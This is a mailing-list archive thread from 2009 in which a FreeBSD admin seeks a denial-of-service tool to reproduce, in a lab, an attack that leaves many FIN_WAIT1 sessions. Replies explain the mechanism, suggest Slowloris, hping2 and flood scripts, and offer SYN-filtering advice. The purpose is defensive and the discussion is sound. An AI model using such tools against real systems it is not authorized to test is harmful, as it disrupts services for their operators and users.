Penetration Testing mailing list archives
Re: DOS attack tool can be used in lab
From: madunix <madunix () gmail com>
Date: Fri, 11 Sep 2009 11:56:27 +0300
hping2, httpflood, or any ddos tools scripts in perl or py -mu On Wed, Sep 9, 2009 at 9:14 PM, R. DuFresne <dufresne () sysinfo com> wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Which only prevents the internal network from being tramatized. The external link would still be hosed, at least would be if the pipe sending syn's exceeds the receiving pipe. Resource exhaustion and pipe flooding are rather difficult to defend against. Most often the only recourse is to go further up your network stream to seek a larger pipe there to filter for you. It's the price you pay for the game you play. thanks, Ron DuFresne On Wed, 9 Sep 2009, Robert Portvliet wrote:You could set a firewall rule to drop any incoming SYN packets from the Internet, which is a very good idea anyway unless you have some specific need for it (ie: this machine is on the DMZ & is a web server). On Mon, Sep 7, 2009 at 7:38 AM, L. Pop <zhiglee () gmail com> wrote:Thanks for your help! Now i am clear that how we get attacked: firtly they established tcp connection with us, then they just ignore our "FIN" package, server have to resend packet for 12 times, then send RST packet to give up. The interval of retry gradually increases: [1st] 1s plus/minus 0.5s [2nd] 3s plus/minus 0.5s [3rd] 6s plus/minus 0.5s .... [7th] 64s plus/minus 0.5s [8th] 64s plus/minus 0.5s .... [12th] 64s plus/minus 0.5s However, i am not confident to change those paramters, after all those setting applys to all the tcp session. My OS is FreeBsd 6.4 Still need your help on how to prevent such attack. Kind Regards, Pop 2009/9/3 HD Moore <hdm () digitaloffense net>:On Wed, 2009-09-02 at 11:28 +0800, L. Pop wrote:Hi Guys, Recently one of our freebsd servers always experience "Socket: No buffer space available..." Errors, and there are too many FIN_Wait1s in system, it is likely that we are being DOSed. Is there any handy DOS simulate tool that i can use in lab to reproduce the problem. Thanks in advance!This issue occurs when your side of the connection is trying to send data, but the remote side stops receiving it (reduces the TCP window to 0 or a small value). With enough of these sessions, you start to hit that message. I believe you can reproduce this with Slowaris: http://ha.ckers.org/blog/20090617/slowloris-http-dos/------------------------------------------------------------------------ This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org ------------------------------------------------------------------------------------------------------------------------------------------------ This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org ------------------------------------------------------------------------- -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com Key fingerprint = 9401 4B13 B918 164C 647A E838 B2DF AFCC 94B0 6629 These things happened. They were glorious and they changed the world..., and then we fucked up the endgame. --Charlie Wilson -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iD8DBQFKp/CFst+vzJSwZikRAj7xAKDWCxUZR6lNzyhcAJDP4WCCpIpcqgCgvQya zHEbe+xXVk42I06T5K864Us= =vmQx -----END PGP SIGNATURE----- ------------------------------------------------------------------------ This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org ------------------------------------------------------------------------
-- http://madunix.googlepages.com/ http://madunixblog.blogspot.com/ ------------------------------------------------------------------------ This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org ------------------------------------------------------------------------
Current thread:
- DOS attack tool can be used in lab L. Pop (Sep 02)
- RE: DOS attack tool can be used in lab Thor (Hammer of God) (Sep 02)
- Re: DOS attack tool can be used in lab Javier Reyna (Sep 02)
- Re: DOS attack tool can be used in lab Shawn Merdinger (Sep 02)
- Message not available
- Re: DOS attack tool can be used in lab L. Pop (Sep 08)
- Re: DOS attack tool can be used in lab Robert Portvliet (Sep 09)
- Re: DOS attack tool can be used in lab R. DuFresne (Sep 09)
- Re: DOS attack tool can be used in lab madunix (Sep 14)
- Re: DOS attack tool can be used in lab L. Pop (Sep 08)